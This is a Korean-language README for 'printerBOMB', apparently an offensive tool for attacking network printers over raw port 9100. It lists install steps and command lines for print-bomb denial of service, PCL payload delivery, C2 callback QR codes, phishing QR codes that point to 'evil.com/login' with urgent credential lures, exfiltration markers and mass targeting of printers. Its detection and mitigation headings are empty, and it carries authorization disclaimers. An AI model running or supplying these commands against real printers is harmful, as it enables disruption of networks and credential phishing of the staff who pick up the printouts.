
프린터 보안 테스트를 위한 익스플로잇 프레임워크로, 원시 포트 9100을 통해 PCL 페이로드 전달, DoS 폭탄 공격, C2 QR 코드, 피싱 QR 코드, 그리고 은밀한 데이터 유출 마커 기능을 제공합니다.
____ _ _ _____ _ _ ___
| _ \| | | | | __ \ | \ | | _|
| |_) | | __ | | __ | |__) | __ | \| | | _
| _ <| | / _| | |/ / | ___/ ' \| . ` | | (_)
| |_) | | \_| | < | | | (_) | |\ | |___ |
|____/|_| \__ |_|\_\|_| \___/|_| \_|_____|
_ _ | |
| | | | | |
| |_| | | |
\___/ |_|
______
|______|
| |
|______|
🖨️ printerBOMB - 프린터 스풀링 공격 프레임워크
간과된 공격 벡터 악용: 네트워크 프린터
개발자: Azhari Ramadhan 🔥
PrintHack은 보안 전문가, 레드 팀, 침투 테스터를 위해 설계된 정교한 프린터 악용 도구입니다. 이 도구는 원시 프린터 스풀링 프로토콜(포트 9100)을 활용하여 보안 평가, 프린터 취약점 테스트, 실제 공격 시나리오 시뮬레이션을 수행합니다.
⚠️ 면책 조항: 이 도구는 합법적인 보안 테스트 및 교육 목적으로만 사용됩니다. 소유한 시스템 또는 명시적 테스트 승인을 받은 시스템에서만 책임감 있게 사용하십시오.
git clone https://github.com/AzhariRamadhan/CVE-PORT-9100.git
cd CVE-PORT-9100
pip install -r requirements.txt
Pillow - 이미지 처리qrcode - QR 코드 생성requests - HTTP 요청pip install Pillow qrcode requests
# 프린터 연결 테스트
python3 printerhack.py -t 192.168.1.100 --check
# 테스트 페이지 전송
python3 printerhack.py -t 192.168.1.100 --test
# 사용자 정의 메시지 인쇄
python3 printerhack.py -t 192.168.1.100 -m "Hello from Red Team!"
# URL에서 이미지 인쇄 (ASCII로 변환)
python3 printerhack.py -t 192.168.1.100 -i http://example.com/image.png
# PCL 페이로드 전송
python3 printerhack.py -t 192.168.1.100 --pcl
# 프린트 폭탄 (DoS - 10MB)
python3 printerhack.py -t 192.168.1.100 --bomb 10
# C2 콜백 QR 코드 인쇄
python3 printerhack.py -t 192.168.1.100 --c2 "http://c2-server:8080/beacon"
# 피싱 QR 코드 인쇄
python3 printerhack.py -t 192.168.1.100 --phish "http://evil.com/login" "URGENT: Verify your credentials"
# 파일에서 여러 프린터로 인쇄
echo -e "192.168.1.100\n192.168.1.101\n192.168.1.102" > targets.txt
python3 printerhack.py -f targets.txt -m "Security Test Message"
물리적 접근 시나리오에서 손상된 프린터에 은밀한 메시지나 지침을 인쇄합니다.
보안 공지로 위장한 자격 증명 수집 페이지로 연결되는 QR 코드를 인쇄합니다.
인코딩된 데이터의 은밀한 유출 채널로 프린터 출력을 사용합니다.
프린터 기반 서비스 거부 공격에 대한 조직의 복원력을 테스트합니다.
네트워크 전체에서 프린터를 열거하고 식별합니다.
탐지 지표:
완화 전략:
THIS TOOL IS PROVIDED "AS IS" FOR LEGITIMATE SECURITY TESTING ONLY.
THE AUTHOR IS NOT LIABLE FOR ANY MISUSE OF THIS TOOL.
ALWAYS obtain written authorization before testing any system.
Unauthorized use may violate Computer Fraud and Abuse Act (CFAA)
and similar laws in your jurisdiction.
Developed by: Azhari Ramadhan
기여를 환영합니다! 다음 사항을 준수해 주세요:
개발자: Azhari Ramadhan 🔥
MIT 라이선스 - 자세한 내용은 LICENSE 참조
🖨️ printerBOMB - 마지막 방어선 악용
공격자처럼 생각하여 공격자보다 앞서 나가세요
Azhari Ramadhan이 🔥로 제작
| 기능 | 설명 |
|---|
--check | 프린터 연결 테스트 |
--test | 테스트 페이지 전송 |
--message | 사용자 정의 페이로드 인쇄 |
--image | URL에서 이미지 인쇄 (ASCII 아트) |
--pcl | PCL 형식 페이로드 전송 |
--bomb | DoS 공격 (대량 페이로드) |
--c2 | C2 콜백 QR 코드 인쇄 |
--phish | 피싱 QR 코드 인쇄 |
--exfil | 데이터 유출 마커 인쇄 |
--file | 여러 대상에 대량 인쇄 |